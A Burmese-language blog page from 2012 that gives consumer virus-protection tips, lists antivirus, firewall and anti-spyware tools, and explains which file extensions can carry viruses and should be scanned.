Latest Post
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts
Labels
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Health
Kategori
Latest News
Powered by Blogger.
iOS
Featured Games Today
Ads 468x60px
Pages
Business
Featured Posts Coolbthemes
featured-video
Blog Archive
featured-content2
featured-content2
featured-content2
Author Details
My Blog List
featured-content2
Videos
Technology
Pages
Fashion
Decoration
Header Ads
Breaking News
Text Widget
Android
Sample text
Fashion
Labels
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Labels
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Contributors
Label
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Follow Us @templatesyard
Followers
Social Icons
Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts
Monday, March 26, 2012
Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း (ျဖည့္စြက္ခ်က္)
Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း ဆိုျပီး post တစ္ခုတင္ခဲ႔ပါတယ္... အဲဒီထဲမွာ လိုအပ္ေနတဲ႔ အခ်က္ေတြကို ျဖည့္စြက္ေပးဖို႔ ျဖည့္စြက္ခ်က္ေတြကို ဆက္တင္ေပးလိုက္ပါတယ္....။
၁။ Antivirus ႏွင့္ Tool မ်ား
Virus မ၀င္ေအာင္ ကာကြယ္ႏို္င္ဖို႔အတြက္ အေရးပါတဲ႔ အခန္းက႑မွာ ပါ၀င္တဲ႔ Antivirus နဲ႔ Tool မ်ားကို ေဖာ္ျပလိုက္တယ္...။
Antivirus------------------------------------------Anti Spyware
BitDefender Antivirus 2010---------------------Spy Sweeper 6.1
Kaspersky Antivirus 2010-----------------------CounterSpy 3
Webroot Antivirus -------------------------------STOPzilla 5.x
Norton Antivirus 2010---------------------------Malwarebytes Anti Malware
ESET Nod32 Antivirus 4--------------------------Spyware Doctor 5.5
AVG Anti-Virus 9----------------------------------SUPER Anti Spyware Pro 4.0
F-Secure Anti-Virus 2010-----------------------Ad-Aware Pro 2010
G DATA AntiVirus 2010--------------------------AntiSpy 5.0
Avira Antivirus Premium------------------------Spyware BeGone 9.15
Trend Micro Antivirus---------------------------CA Anti Spyware
ClamWin Free Antivirus--------------------------a-squared Free 4.5
Avast! Home Edition------------------------------CWShredder 2.19
COMODO Antivirus--------------------------------Trend Micro HijackThis 2.0.3
PC Tools Antivirus---------------------------------Spybot Search and Destroy
Panda Antivirus Pro 2010------------------------Spyware Terminator 2.6.5.111
McAfee VirusScan Plus --------------------------Spyware Blaster 4.2
Quick Heal Antivirus 2010-----------------------Window Defender
ArcaVir Home Protection-----------------------I hate Keyloggers 1.0
BullGuard Internet Security--------------------Ashampoo AntiSpyware
F-PROT Antivirus
Firewalls---------------------------------------------Email Protection
ZoneAlarm Pro 7.0--------------------------------MailWasher
Outpost Firewall Free---------------------------Spamihilator
Norman Personal Firewall----------------------SpamBayes
eConceal Pro 2.0---------------------------------SpamDel
Webroot Desktop Firewall 5.5-----------------Inbox
Injoy Firewall 4------------------------------------GFI Email Security Test
Sygate Personal Firewall------------------------SpamEater Pro
Comodo Firewall----------------------------------CA Anti-Spam
Primedius Firewall Lite------------------------- SPAMifighter
R-Firewall------------------------------------------- ChoiceMail One
Sunblet Personal Firewall----------------------Spam Killer
Sensive Guard--------------------------------------Spam Buster
Ashampoo FireWall-------------------------------Spam Agent
-------------------------------------------------------- iHateSpam
Rootkit Detection & Removal--------------Encryption
Rootkit Revealer-----------------------------------Password Safe
Rootkits Detection & Removal-----------------WinGuard Pro Free
threatfire--------------------------------------------Truecrypt
Panda Anti-Rootkit--------------------------------Crypainer LE
UnHackMe------------------------------- -----------Steganos LockNote
Rootkit Hook Analyzer---------------------------Kruptos 2
---------------------------------------------------=-----Najitool GUI
----------------------------------------------------------Registry Pot
----------------------------------------------------------pcdecrapifier
Cleaning & Tweaking-------------------------Anti-Keylogger
CleanUp! 4.5.2-------------------------------------Privacy Keyboard 9.2.1
Heidi Eraser----------------------------------------Zemana Anti-Logger
DeFraggler------------------------------------------Advanced Anti Keylogger 3.6
Autoruns--------------------------------------------Anti-Keylogger 9.2.1
CCleaner------------------------------------------- Data Guard 2009 Ultimate
O&O Defrag 2000 Freeware-------------------Elite Anti-Keylogger 3.0
Abexo Free Registry Cleaner 1---------------FireLion Anti-Keyloggers 2.0
PC Inspector File Recovery
Process Explorer
Recuva 1.01.069 Beta
Tweak UI
Unlocker 1.8.5
Tiny Watcher
Advanced SystemCare Free
ATF Cleaner 3.0.0.2
၂။ အႏၲရာယ္ရွိႏိုင္ေသာ file extension မ်ား
Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း post ထဲမွာ အႏၲရာယ္ရွိႏိုင္တဲ႔ file extension အနည္းငယ္ကို ေဖာ္ျပခဲ႔ပါတယ္။ အဲဒီထဲမွာ လိုအပ္ခ်က္ရွိေနတဲ႔ file type ေတြကို ဒီမွာ ဆက္လက္ေဖာ္ျပေပးလိုက္ပါတယ္။
ဒီေလာက္ဆိုရင္ေတာ့ file type ေတြအေၾကာင္းကို သိၾကလိမ့္မယ္လို႔ ယူဆရပါတယ္။ေနာင္ကိုလည္း ျဖည့္စြက္ခ်က္ေတြ ထပ္တင္ေပးပါ့မယ္။
၁။ Antivirus ႏွင့္ Tool မ်ား
Virus မ၀င္ေအာင္ ကာကြယ္ႏို္င္ဖို႔အတြက္ အေရးပါတဲ႔ အခန္းက႑မွာ ပါ၀င္တဲ႔ Antivirus နဲ႔ Tool မ်ားကို ေဖာ္ျပလိုက္တယ္...။
Antivirus------------------------------------------Anti Spyware
BitDefender Antivirus 2010---------------------Spy Sweeper 6.1
Kaspersky Antivirus 2010-----------------------CounterSpy 3
Webroot Antivirus -------------------------------STOPzilla 5.x
Norton Antivirus 2010---------------------------Malwarebytes Anti Malware
ESET Nod32 Antivirus 4--------------------------Spyware Doctor 5.5
AVG Anti-Virus 9----------------------------------SUPER Anti Spyware Pro 4.0
F-Secure Anti-Virus 2010-----------------------Ad-Aware Pro 2010
G DATA AntiVirus 2010--------------------------AntiSpy 5.0
Avira Antivirus Premium------------------------Spyware BeGone 9.15
Trend Micro Antivirus---------------------------CA Anti Spyware
ClamWin Free Antivirus--------------------------a-squared Free 4.5
Avast! Home Edition------------------------------CWShredder 2.19
COMODO Antivirus--------------------------------Trend Micro HijackThis 2.0.3
PC Tools Antivirus---------------------------------Spybot Search and Destroy
Panda Antivirus Pro 2010------------------------Spyware Terminator 2.6.5.111
McAfee VirusScan Plus --------------------------Spyware Blaster 4.2
Quick Heal Antivirus 2010-----------------------Window Defender
ArcaVir Home Protection-----------------------I hate Keyloggers 1.0
BullGuard Internet Security--------------------Ashampoo AntiSpyware
F-PROT Antivirus
Firewalls---------------------------------------------Email Protection
ZoneAlarm Pro 7.0--------------------------------MailWasher
Outpost Firewall Free---------------------------Spamihilator
Norman Personal Firewall----------------------SpamBayes
eConceal Pro 2.0---------------------------------SpamDel
Webroot Desktop Firewall 5.5-----------------Inbox
Injoy Firewall 4------------------------------------GFI Email Security Test
Sygate Personal Firewall------------------------SpamEater Pro
Comodo Firewall----------------------------------CA Anti-Spam
Primedius Firewall Lite------------------------- SPAMifighter
R-Firewall------------------------------------------- ChoiceMail One
Sunblet Personal Firewall----------------------Spam Killer
Sensive Guard--------------------------------------Spam Buster
Ashampoo FireWall-------------------------------Spam Agent
-------------------------------------------------------- iHateSpam
Rootkit Detection & Removal--------------Encryption
Rootkit Revealer-----------------------------------Password Safe
Rootkits Detection & Removal-----------------WinGuard Pro Free
threatfire--------------------------------------------Truecrypt
Panda Anti-Rootkit--------------------------------Crypainer LE
UnHackMe------------------------------- -----------Steganos LockNote
Rootkit Hook Analyzer---------------------------Kruptos 2
---------------------------------------------------=-----Najitool GUI
----------------------------------------------------------Registry Pot
----------------------------------------------------------pcdecrapifier
Cleaning & Tweaking-------------------------Anti-Keylogger
CleanUp! 4.5.2-------------------------------------Privacy Keyboard 9.2.1
Heidi Eraser----------------------------------------Zemana Anti-Logger
DeFraggler------------------------------------------Advanced Anti Keylogger 3.6
Autoruns--------------------------------------------Anti-Keylogger 9.2.1
CCleaner------------------------------------------- Data Guard 2009 Ultimate
O&O Defrag 2000 Freeware-------------------Elite Anti-Keylogger 3.0
Abexo Free Registry Cleaner 1---------------FireLion Anti-Keyloggers 2.0
PC Inspector File Recovery
Process Explorer
Recuva 1.01.069 Beta
Tweak UI
Unlocker 1.8.5
Tiny Watcher
Advanced SystemCare Free
ATF Cleaner 3.0.0.2
၂။ အႏၲရာယ္ရွိႏိုင္ေသာ file extension မ်ား
Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း post ထဲမွာ အႏၲရာယ္ရွိႏိုင္တဲ႔ file extension အနည္းငယ္ကို ေဖာ္ျပခဲ႔ပါတယ္။ အဲဒီထဲမွာ လိုအပ္ခ်က္ရွိေနတဲ႔ file type ေတြကို ဒီမွာ ဆက္လက္ေဖာ္ျပေပးလိုက္ပါတယ္။
.386
Windows Enhanced Mode Driver ျဖစ္ပါတယ္။ device driver ဟာ executable code ျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္။ ဒါေၾကာင့္ scan ဖတ္သင့္ပါတယ္။
.ADE
Microsoft Access Project Extension ျဖစ္ပါတယ္။ macro virus ေတြက ၄င္းရဲ႕ အားနည္းခ်က္ေတြကို အသံုးခ်ႏိုင္ပါတယ္။
.ADP
Microsoft Access Project ျဖစ္ပါတယ္။ ဒီ extension ကိုလည္း macros ေတြက အသံုးခ်ႏိုင္ပါတယ္။
.APP
Application File ျဖစ္ပါတယ္။ programအမ်ိဳးမ်ိဳးနဲ႔ ဆက္စပ္ေနတဲ႔ extension ျဖစ္ပါတယ္။ standalone program မ်ားနဲ႔ ဆင္တူေအာင္ျပဳလုပ္ႏိုင္ျပီး database programမ်ားကို တုန္႔ျပန္ႏိုင္ပါတယ္။
.ASP
Active Server Page ျဖစ္ပါတယ္။ programေတြ၊ HTML code ေတြနဲ႔ ေပါင္းစပ္ထားတာျဖစ္ပါတယ္။
.BAS
Microsoft Visual Basic Class Module ျဖစ္ပါတယ္။ ၄င္းတို႔ဟာ programေတြ ျဖစ္ပါတယ္။
.BAT
Batch File ေတြျဖစ္ပါတယ္။ ၄င္းတို႔ဟာ system command ေတြပါ၀င္တဲ႔ text fileေတြ ျဖစ္ၾကပါတယ္။ ၄င္းတို႔ထဲက အခ်ိဳ႕ဟာ batch file virusေတြ ျဖစ္ႏိုင္ပါတယ္ ... ဒါေပမယ့္ အကုန္လံုးေတာ့ မဟုတ္ပါဘူး။
.BIN
Binary File ျဖစ္ပါတယ္။ task အမ်ိဳးအမ်ိဳးအတြက္ သံုးျပဳနိုင္ျပီး အမ်ားအားျဖင့္ program တစ္ခုနဲ႔ ဆက္စပ္ေနတတ္ပါတယ္။ ထပ္လႊမ္းထားတဲ႔ ဖိုင္တစ္ခုနဲ႔ တူျပီး virus ကူးစက္ဖို႔ျဖစ္ႏိုင္ေျခရွိပါတယ္။ ဒါေပမယ့္ အျမဲတမ္းေတာ့ မဟုတ္ပါဘူး။
.BTM
4DOS Batch To Memory Batch File ျဖစ္ပါတယ္။ Virus ပါ၀င္တဲ႔ Batch file ျဖစ္ႏိုင္ပါတယ္။
.CBT
Computer Based Training ပါ။ ၄င္းကို clear ျဖစ္ေအာင္ မလုပ္ႏိုင္ပါဘူး။ ၄င္း ကလည္း virus ကူးစက္ႏိုင္တဲ႔ extension တစ္ခုျဖစ္ပါတယ္။ ဒါေပမယ့္ ၄င္းတို႔ရဲ႕ default list ထဲမွာ Symantec ပါ၀င္ပါတယ္။
.CHM
Compiled HTML Help File ျဖစ္ပါတယ္။ scripေတြနဲ႔ ၄င္းရဲ႕ အားနည္းခ်က္ကို အသံုးခ်ႏိုင္ပါတယ္။
.CLA
.CLASS
Java Class File ျဖစ္ပါတယ္။ sandbox တစ္ခုထဲကေန run ဖို႔အတြက္ suppose လုပ္ႏိုင္တဲ႔ Java applet ေတြျဖစ္ျပီး system ကေနခြဲထုတ္ထားပါတယ္။ sandbox က secure ကိုထည့္သြင္းတြက္ခ်က္ႏိုင္တဲ႔ mode တစ္ခုထဲမွာ run ေနတဲ႔ applet တစ္ခုထဲကို ပရိယာယ္ဆင္ဖို႔အတြက္ user ေတြက ျပဳလုပ္ႏိုင္ပါတယ္။ဒါေၾကာင့္ Class file ေတြကို scanဖတ္သင့္ပါတယ္။
.CMD
Window NT Command Script ျဖစ္ပါတယ္။ NT အတြက္ batch file တစ္ခုျဖစ္ပါတယ္။
.COM
Command(Executable File) ျဖစ္ပါတယ္။ ဘယ္executable file မဆို နည္းလမ္းအမ်ိဳးမ်ိဳးနဲ႔ virus ပါ၀င္ေနႏိုင္ပါတယ္။
.CPL
Control Panel Extension ျဖစ္ပါတယ္။ executable code ေတြပါ၀င္တဲ႔ device driver တစ္ခုနဲ႔ ဆင္တူျပီး virus ပါ၀င္ေနႏိုင္တဲ႔အတြက္ scan ဖတ္သင့္ပါတယ္။
.CRT
Security Certificate ျဖစ္ပါတယ္။ ၄င္းနဲ႔အတူ virus code ေတြ ေပါင္းစပ္ပါ၀င္ႏိုင္ပါတယ္။
.CSC
Corel Script File ျဖစ္ပါတယ္။ executable ျဖစ္တဲ႔ script file ရဲ႕ type တစ္ခုျဖစ္ပါတယ္။ virus scan ဖတ္သင့္ပါတယ္။
.CSS
Hypertext Cascading Style Sheet ျဖစ္ပါတယ္။ Style Sheet ေတြထဲမွာ Virus code ေတြပါ၀င္ႏိုင္ပါတယ္။
.DLL
Dynamic Link Library ျဖစ္ပါတယ္။ လုပ္ငန္းတာ၀န္အမ်ိဳးမ်ိဳးကို လုပ္ေဆာင္ႏိုင္ျပီး program တစ္ခုနဲ႔ ဆက္စပ္ေနတတ္ပါတယ္။အမ်ားအားျဖင့္ေတာ့ DLL ေတြဟာ function ေတြကို programေတြဆီသို႔ ေပါင္းထည့္ေပးတာျဖစ္ပါတယ္။အခ်ိဳ႕ကေတာ့ executable code ေတြပါ၀င္ေနျပီး မ်ားေသာအားျဖင့္ functionေတြ (သို႔) data ေတြ ရိုးရိုးရွင္းရွင္းပဲ ပါ၀င္ပါတယ္။ ဒါေပမယ့္ virus ပါ မပါဆိုတာကို မသိႏိုင္တဲ႔အတြက္ scan ဖတ္သင့္ပါတယ္။
.DOC
MS Word Document ျဖစ္ပါတယ္။ Word document ေတြထဲမွာ macro virusေတြပါ၀င္ေနႏိုင္ျပီး virus ေတြနဲ႔ wormေတြအတြက္ အျပည့္အ၀ အသံုးခ်ႏိုင္ပါတယ္။
.DOT
MS Word Document Template ျဖစ္ပါတယ္။ Word Tamplateေတြထဲမွာလည္း macro virus ေတြ ပါ၀င္ႏိုင္ျပီး virus နဲ႔ worm ေတြအတြက္ အျပည့္အ၀ အသံုးခ်ႏိုင္ပါတယ္။
.DRV
Device Driver ျဖစ္ပါတယ္။ device driver တစ္ခုဟာ executable code ျဖစ္ပါတယ္။ဒါေၾကာင့္ virus ပါ၀င္ေနႏိုင္ျပီး scan ဖတ္သင့္ပါတယ္။
.EML
MS Outlook Express E-mail ျဖစ္ပါတယ္။ E-mail message ေတြမွာ HTML နဲ႔ script ေတြပါ၀င္ႏိုင္ပါတယ္။ virus နဲ႔ worms အမ်ားစုက ဒီအားနည္းခ်က္ကို အသံုးခ်ၾကပါတယ္။
.EXE
Executable File ျဖစ္ပါတယ္။ ဘယ္executable file မဆို နည္းလမ္းအမ်ိဳးမ်ိဳးနဲ႔ virus ေတြပါ၀င္ႏိုင္ပါတယ္။
.FON
Font ျဖစ္ပါတယ္။ ယံုလို႔လည္း ရတယ္ မယံုလို႔လည္း ရတဲ႔ extension တစ္ခုျဖစ္ပါတယ္။ font file တစ္ခုထဲမွာ executable code ေတြရွိေနႏိုင္တဲ႔အတြက္ virus ပါ၀င္ႏိုင္ပါတယ္။
.HLP
Help File ျဖစ္ပါတယ္။ Help File ေတြထဲမွာ macro virus ေတြပါ၀င္ႏိုင္ပါတယ္။ ၄င္းတို႔က အမ်ားအားျဖင့္ေတာ့ virus မပါ ပါဘူး။ ဒါေပမယ့္ Trojan တစ္ခု၊ ႏွစ္ခုေတာ့ ထည့္ထားႏိုင္ပါတယ္။
.HTA
HTML Program ပါ။ scriptေတြ ပါ၀င္ႏိုင္ပါတယ္။
.HTM
.HTML
Hypertext Markeup Language ျဖစ္ပါတယ္။ HTML file ေတြဟာ ပိုပိုျပီး virus သယ္ေဆာင္တဲ႔ script ေတြ ပါ၀င္ႏိုင္ပါျပီ။
.INF
Setup Information ပါ။ Setup scriptေတြဟာ ေမွ်ာ္လင့္မထားတဲ႔ အရာေတြကို ျပဳလုပ္ဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။
.INI
Initialization File ျဖစ္ပါတယ္။ program option ေတြပါ၀င္ ပါတယ္။
.INS
Internet Naming Service ျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာကို ညႊန္းျပေပးဖို႔ ေျပာင္းလဲႏိုင္ၾကပါတယ္။
.ISP
Internet Communication Setting ေတြျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ အရာေတြကို ညႊန္ျပဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။
.JS
.JSE
JavaScript ျဖစ္ပါတယ္။ script fileေတြဟာ virus ပါ၀င္တဲ႔ file ေတြျဖစ္လာၾကပါျပီ။ ဒါေၾကာင့္ အေကာင္းဆံုးကေတာ့ ၄င္းတို႔ကို scan ဖတ္သင့္ပါတယ္။ (.JSE ဟာ encode ျဖစ္ပါတယ္။ ဒါေၾကာင့္ တစ္ခုမွတ္ထားရမွာက ၄င္းတို႔ဟာ အျခားအရာေတြ၊ Random၊ Extensionေတြ ပါ၀င္ေနႏိုင္တယ္ ဆိုတာပါပဲ။)
.LIB
Library ျဖစ္ပါတယ္။ သီအိုရီအရေတာ့ ၄င္း file ေတြဟာလည္း virus ပါ၀င္ႏိုင္ပါတယ္။ ဒါေပမယ့္ အခုထိေတာ့ LIB-File virus ေတြကို ေဖာ္ျပေပးႏိုင္ျခင္း မရွိေသးပါဘူး။
.LNK
Link ျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာေတြကို ညႊန္ျပဖို႔အတြက္ ေျပာင္းလဲႏိုင္ပါတယ္။
.MDB
MS Access Database (သို႔) MS Access Application ျဖစ္ပါတယ္။ Access fileေတြမွာ macro virusေတြ ပါ၀င္ေနႏိုင္ျပီး virus ေတြ၊ wormေတြက ၄င္းကို အျပည့္အ၀ အသံုးခ်ႏိုင္ၾကပါတယ္။
.MDE
Microsoft Access MDE database ျဖစ္ပါတယ္။ macro ေတြ၊ scriptေတြက ၄င္းရဲ႕ အားနည္းခ်က္ကို အသံုးခ်ႏိုင္ပါတယ္။
.MHT
.MHTM
.MHTML
MHTML Document ျဖစ္ပါတယ္။ ၄င္းတို႔က Web page ကိုသိမ္းဆည့္တဲ႔ဟာ ျဖစ္ပါတယ္။ ၄င္းတို႔မွာ scriptေတြပါ၀င္ႏိုင္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။
.MP3
MP3 Program ျဖစ္ပါတယ္။အမွန္တကယ္ music file ေတြက virus မကူးစက္ႏိုင္ပါဘူး...ဒါေပမယ့္ .mp3 extensionေတြနဲ႔ အတူပါတဲ႔ fileေတြမွာ Windows (သို႔) RealNetwork media playerေတြက အဓိပၸာယ္ေကာက္ယူျပီး run ႏိုင္တဲ႔ macro code ေတြပါ၀င္ေနႏိုင္ပါတယ္။ ဒါေၾကာင့္ အမွန္တကယ္ music file ရဲ႕ အလြန္မွာ က်ယ္ျပန္႔မႈေတြရွိပါတယ္။
.MSO
Math Script Object ျဖစ္ပါတယ္။ Symantec အရေတာ့ ၄င္းတို႔ဟာ database-related program file ေတြျဖစ္ပါတယ္။
.MSC
Microsoft Common Console Document ေတြျဖစ္ပါတယ္။ ေမွ်ာ္လင့္မထားတဲ႔ ေနရာကို ညႊန္ျပေပးဖို႔အတြက္ ေျပာင္းလဲေပးႏိုင္ၾကပါတယ္။
.MSI
Microsoft Windows Installer Package ျဖစ္ပါတယ္။ Virus code ေတြ ပါ၀င္ႏိုင္ပါတယ္။
.MSP
Microsoft Windows Installer Patch ျဖစ္ျပီး virus code ေတြပါ၀င္ႏိုင္ပါတယ္။
.MST
Microsoft Visual Test Source File ျဖစ္ပါတယ္။ Source ေတြေျပာင္းလဲႏိုင္ပါတယ္။
.OBJ
Relocatable Object Code ျဖစ္ပါတယ္။ ၄င္း fileေတြဟာ programေတြနဲ႔ ဆက္စပ္ေနပါတယ္။
.OCX
Object Linking နဲ႔ Embedding (OLE) Control Extension ျဖစ္ပါတယ္။Web page တစ္ခုကေန download ျပဳလုပ္ႏိုင္တဲ႔ program တစ္ခုျဖစ္ပါတယ္။
.OV?
Program File Overlay ျဖစ္ပါတယ္။ progarm တစ္ခုနဲ႔အတူ လုပ္ငန္းတာ၀န္အမ်ိဳးမ်ိဳးကို ျပဳလုပ္ဖို႔အသံုးျပဳႏိုင္ပါတယ္။ ေယဘူယ်အားျဖင့္ေတာ့ Overlayေတြဟာ functionေတြကို programေတြဆီသို႔ ေပါင္းထည့္ေပးဖို႔ျဖစ္ပါတယ္။Overlay fileေတြမွာ virus ပါ၀င္ေနႏိုင္ပါတယ္။ ဒါေပမယ့္အမ်ားအားျဖင့္ေတာ့ မပါ ပါဘူး။
.PCD
Photo CD MS Compiled Script ျဖစ္ပါတယ္။ Scriptေတြဟာ အားနည္းခ်က္ေတြျဖစ္ပါတယ္။
.PGM
Program File ျဖစ္ပါတယ္။ program အမ်ိဳးအမ်ိဳးနဲ႔ ဆက္စပ္ေနပါတယ္။ standalone program မ်ားနဲ႔ ဆင္တူေအာင္ျပဳလုပ္ႏိုင္ျပီး database programမ်ားကို တုန္႔ျပန္ႏိုင္ပါတယ္။
.PIF
MS-DOS Shortcut ျဖစ္ပါတယ္။ ၄င္းကို ေျပာင္းလဲလိုက္မယ္ဆိုရင္ေတာ့ ေမွ်ာ္လင့္မထားတဲ႔ programေတြ အျဖစ္ run ႏိုင္ပါတယ္။
.PPT
MS PowerPoint Presentation ျဖစ္ပါတယ္။ ၄င္းထဲမွာ macro virus ေတြပါ၀င္ေနႏိုင္ျပီး virus ေတြ၊ warmေတြက ၄င္းကို အျပည့္အ၀ အသံုးခ်ႏိုင္ၾကပါတယ္။
.PRC
Palmpilot Resource File ျဖစ္ပါတယ္။ PDA program တစ္ခုျဖစ္ျပီး ရွားရွားပါ PDA virus ေတြရွိေနႏိုင္ပါတယ္။
.REG
Registry Entryေတြျဖစ္ျပီး ၄င္းကို runလိုက္မယ္ဆိုရင္ Registry ကို ေျပာင္းလဲႏိုင္ပါတယ္။
.RTF
Rich Text Format ျဖစ္ပါတယ္။ text ေတြကို formatျပဳလုပ္ ေရႊ႕႕ေျပာင္းေပးဖို႔အတြက္ format တစ္ခုျဖစ္ျပီး အမ်ားအားျဖင့္ေတာ့ ယံုၾကည္ႏိုင္ပါတယ္။ virus ပါ၀င္တဲ႔ Binary object ေတြဟာ RTF file ေတြၾကားထဲမွာ နစ္ျမဳပ္ေနႏိုင္ပါတယ္။ ဒါေၾကာင့္ လံုျခံဳစိတ္ခ်ရဖို႔အတြက္ scan ဖတ္သင့္တဲ႔အထဲမွာ ပါ ပါတယ္။RTF ဖိုင္ေတြဟာ DOC file ေတြကို rename ေပးႏိုင္ျပီး Word က ၄င္းတို႔ကို DOC fileေတြကဲ႔သို႔ ဖြင့္ပါတယ္။
.SCR
Screen Saver (သို႔) Script ျဖစ္ပါတယ္။ Screen Saverေတြနဲ႔ Scriptေတြ ႏွစ္ခုစလံုးက executable code ေတြျဖစ္ပါတယ္။ ဒါေၾကာင့္ virus ေတြပါ၀င္ေနႏိုင္သလို warm (သို႔) Trojan ေတြထည့္ထားႏိုင္ပါတယ္။
.SCT
Windows Script Component ျဖစ္ပါတယ္။ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။
.SHB
.SHS
Shell Scrap Object File ျဖစ္ပါတယ္။ scrap file တစ္ခုမွာ ရိုးစင္းတဲ႔ text file ကေန စြမ္းအားျပည့္၀တဲ႔ executable file ေတြအထိပါ၀င္ႏိုင္ပါတယ္။တျခားတစ္ေယာက္ကေနသင့္ဆီကို ေပးပို႔ခဲ့မယ္ဆိုရင္ အမ်ားအားျဖင့္ေတာ့ ၄င္းတို႔ကို ေရွာင္ရွားသင့္ပါတယ္။ ဒါေပမယ့္ ပံုမွန္အားျဖင့္ေတာ့ single systemေတြေပၚမွာ operation system အားျဖင့္ အသံုးျပဳၾကပါတယ္။
.SMM
Ami Pro Macro Rare ျဖစ္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။
Source
Source Code ေတြျဖစ္ပါတယ္။ program file ေတြရွိၾကျပီး source code virus အားျဖင့္ virus ကူးစက္ႏိုင္ပါတယ္။(ဒီလိုကူးစက္တယ္ဆိုတာ ရွားေတာ့ ရွားပါတယ္။) သင္ဟာ programmer တစ္ေယာက္ မဟုတ္ခဲ႔ဘူးဆိုရင္ေတာင္မွ စိုးရိမ္စရာေတာ့ မလိုပါဘူး။ Extensionေတြပါ၀င္ျပီး .ASM, .C , .CPP, .PAS, .BAS, .FOR ပဲျဖစ္ရမယ္လို႔ေတာ့ ကန္႔သတ္ခ်က္မရွိပါဘူး။
.SYS
System Device Driver ျဖစ္ပါတယ္။ device driver ဟာ executable code ျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္...ဒါေၾကာင့္ scan ဖတ္သင့္ပါတယ္။
.URL
Internet Shortcut ျဖစ္ပါတယ္။မလိုလားအပ္တဲ႔ Web location ေတြဆီသို႔ သင့္ကို ပို႔ေဆာင္ေပးႏိုင္ပါတယ္။
.VB
.VBE
VBScript File ျဖစ္ပါတယ္။ ဒီ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။(.VBE ဟာ encode ျဖစ္ပါတယ္။)
.VBS
Visual Basic Script ျဖစ္ပါတယ္။ ဒီ script file ေတြမွာ virus ပါ၀င္ႏိုင္သလို warm (သို႔) Trojan တစ္ခုကိုလည္း ထည့္ထားႏိုင္ပါတယ္။
.VXD
Virtual Device Driver ျဖစ္ပါတယ္။ executable code ေတြျဖစ္တဲ႔အတြက္ virus ကူးစက္ႏိုင္ပါတယ္...scan ဖတ္ပါ။
.WSC
Windows Script Component ျဖစ္ပါတယ္။ Scriptေတြဟာ virus ကူးစက္ႏိုင္ပါတယ္။
.WSF
Windows Script File ျဖစ္ျပီး virus ကူးစက္ႏိုင္ပါတယ္။
.WSH
Windows Script Host Settings File ျဖစ္ပါတယ္။ Settingေတြဟာ ေမွ်ာ္လင့္မထားတာေတြကို ျပဳလုပ္ဖို႔အတြက္ ေျပာင္းလဲႏိုင္ၾကပါတယ္။
.XL?
MS Excel File ျဖစ္ပါတယ္။ Excel Worksheet ေတြမွာ macro virus ေတြပါ၀င္ေနႏိုင္ျပီး virus နဲ႔ wormေတြက ၄င္းတို႔ကို အျပည့္အ၀အသံုးျပဳႏိုင္ၾကပါတယ္။
ဒီေလာက္ဆိုရင္ေတာ့ file type ေတြအေၾကာင္းကို သိၾကလိမ့္မယ္လို႔ ယူဆရပါတယ္။ေနာင္ကိုလည္း ျဖည့္စြက္ခ်က္ေတြ ထပ္တင္ေပးပါ့မယ္။
၂၄နာရီ အတြင္း Top 10 Virus မ်ား
ဒါကေတာ့ ၾကိဳတင္ကာကြယ္ႏိုင္ဖို႔အတြက္ အခုေနာက္ဆံုး ၂၄ အတြင္းမွာ ေရပန္းစားေနတဲ႔ ေနာက္ဆံုးေပၚ Top 10 Virus မ်ားျဖစ္ပါတယ္...
The latest alerts - ဒီ Virus ေတြနဲ႔ Trojan ေတြကေတာ့ အခု သင္သံုးေနတဲ႔ current anti-virus softwareကေန delete မလုပ္ႏိုင္ေသးပါဘူး...( ဒါေၾကာင့္ anti-virus ေတြကို update လုပ္ထားဖို႔လိုပါတယ္။ တစ္ခုခ်င္းစီေပၚမွာ Click ၾကည့္ျခင္းအားျဖင့္ အေသးစိတ္အခ်က္အလက္မ်ားကို သိႏိုင္ပါတယ္)
ေအာက္မွာျပထားတဲ႔ Virus ေတြကေတာ့ ယခင္လအတြင္းမွာ ထိပ္ဆံုးေရာက္ေနတဲ႔ top 10 most common viruses ေတြပါ။ ဒီ Virus ေတြကိုလည္း သင္လက္ရွိသံုးေနတဲ႔ Anti-virus software ကေန detect လုပ္ႏိုင္ဖို႔မေသခ်ာေသးပါဘူး...
Virus hoax ေတြကေတာ့ စိတ္အေႏွာင့္အယွက္ျဖစ္ေစတဲ႔ Email "warnings" ေတြျဖစ္ျပီး ၄င္းတို႔က သင့္ရဲ႕ သူငယ္ခ်င္းမ်ားအားလံုးဆီကုိ အဓိပၸာယ္မရွိတဲ႔ေမးလ္ေတြပို႔ေစျပီး သူတို႔ email box ထဲမွာ ဘာမွအသံုးမ၀င္တဲ႔ Email ေပါင္းေျမာက္ျမားစြာနဲ႔ ျပည့္ႏွက္သြားေစပါတယ္
အခ်ိန္မွီကာကြယ္ႏိုင္ဖို႔အတြက္ ျပင္ဆင္ထားႏိုင္ေအာင္ ျဖစ္ပါတယ္...( ေနာက္ဆံုးသတင္းမ်ားကို အခ်ိန္မွီ update လုပ္ေပးသြားပါမယ္...)
